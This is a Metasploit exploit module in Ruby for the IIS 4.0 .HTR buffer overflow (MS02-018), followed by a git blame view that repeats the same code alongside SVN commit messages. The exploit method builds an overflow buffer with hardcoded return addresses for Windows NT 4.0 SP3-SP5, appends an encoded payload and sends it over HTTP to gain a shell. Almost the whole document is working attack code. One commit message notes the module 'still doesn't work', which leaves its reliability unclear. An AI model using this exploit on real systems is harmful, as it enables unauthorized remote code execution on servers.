metasploit-framework/modules/exploits/windows/iis/ms02_018_htr.rb

require 'msf/core'

module Msf

class Exploits::Windows::Iis::MS02_018_HTR < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 4.0 .HTR Path Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in the ISAPI ISM.DLL used to
				process HTR scripting in IIS 4.0. This module works against
				Windows NT 4 Service Packs  3, 4, and 5. The server will
				continue to process requests until the payload being
				executed has exited. If you've set EXITFUNC to 'seh', the
				server will continue processing requests, but you will have
				trouble terminating a bind shell. If you set EXITFUNC to
				thread, the server will crash upon exit of the bind shell.
				The payload is alpha-numerically encoded without a NOP sled
				because otherwise the data gets mangled by the filters.
					
			},
			'Author'         => [ 'stinko' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '3325'],
					[ 'BID', '307'],
					[ 'CVE', '1999-0874'],
					[ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'],
					[ 'MIL', '26'],
					[ 'MSB', 'MS02-018'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows NT 4.0 SP3', {'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }],
					['Windows NT 4.0 SP4', {'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }],
					['Windows NT 4.0 SP5', {'Platform' => 'win', 'Rets' => [ 589, 0x77f76385 ] }],
				],
			'DisclosureDate' => 'Apr 10 2002',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end

	def exploit
		connect

		buf = 'X' * target['Rets'][0]
		buf << [ target['Rets'][1] ].pack('V')
		buf << payload.encoded
		
		req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n"
		print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1])
		sock.put(req)
		handler
		disconnect
	end

end
end
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Iis::MS02_018_HTR < Msf::Exploit::Remote`

			`include Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
Consistency fixes for IIS modules git-svn-id: file:///home/svn/framework3/trunk@3875 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-13 06:25:40 +00:00			`'Name' => 'Microsoft IIS 4.0 .HTR Path Overflow',`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`'Description' => %q{`
			`This exploits a buffer overflow in the ISAPI ISM.DLL used to`
			`process HTR scripting in IIS 4.0. This module works against`
			`Windows NT 4 Service Packs 3, 4, and 5. The server will`
			`continue to process requests until the payload being`
			`executed has exited. If you've set EXITFUNC to 'seh', the`
			`server will continue processing requests, but you will have`
			`trouble terminating a bind shell. If you set EXITFUNC to`
			`thread, the server will crash upon exit of the bind shell.`
			`The payload is alpha-numerically encoded without a NOP sled`
			`because otherwise the data gets mangled by the filters.`

			`},`
Fixed some authors git-svn-id: file:///home/svn/incoming/trunk@3163 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-02 01:18:51 +00:00			`'Author' => [ 'stinko' ],`
BSD license the default for non-msfdev created modules. git-svn-id: file:///home/svn/incoming/trunk@3636 4d416f70-5f16-0410-b530-b9f4589650da 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '3325'],`
			`[ 'BID', '307'],`
			`[ 'CVE', '1999-0874'],`
			`[ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'],`
			`[ 'MIL', '26'],`
			`[ 'MSB', 'MS02-018'],`

			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 2048,`
Changes from Brian Caswell git-svn-id: file:///home/svn/incoming/trunk@3161 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-30 19:42:19 +00:00			`'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),`
StackAdjustment added to most exploits, PNP tweaked git-svn-id: file:///home/svn/framework3/trunk@3783 4d416f70-5f16-0410-b530-b9f4589650da 2006-07-31 02:01:14 +00:00			`'StackAdjustment' => -3500,`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`},`
add Platform git-svn-id: file:///home/svn/incoming/trunk@3533 4d416f70-5f16-0410-b530-b9f4589650da 2006-02-19 04:18:21 +00:00			`'Platform' => 'win',`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`'Targets' =>`
			`[`
			`['Windows NT 4.0 SP3', {'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }],`
			`['Windows NT 4.0 SP4', {'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }],`
			`['Windows NT 4.0 SP5', {'Platform' => 'win', 'Rets' => [ 589, 0x77f76385 ] }],`
			`],`
			`'DisclosureDate' => 'Apr 10 2002',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(80)`
Stuff.. more changes to come git-svn-id: file:///home/svn/incoming/trunk@3253 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-25 22:47:38 +00:00			`], self.class)`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`end`

			`def exploit`
			`connect`

			`buf = 'X' * target['Rets'][0]`
			`buf << [ target['Rets'][1] ].pack('V')`
			`buf << payload.encoded`

* a few updates to make it a bit more like reality, still doesn't work though git-svn-id: file:///home/svn/incoming/trunk@3518 4d416f70-5f16-0410-b530-b9f4589650da 2006-02-07 15:23:54 +00:00			`req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n"`
			`print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1])`
			`sock.put(req)`
IIS exploits ported Added on_new_session callback and session_created? flag to exploit Fixed socket fd leak in Comm::Local git-svn-id: file:///home/svn/incoming/trunk@3135 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-27 18:42:44 +00:00			`handler`
			`disconnect`
			`end`

			`end`
			`end`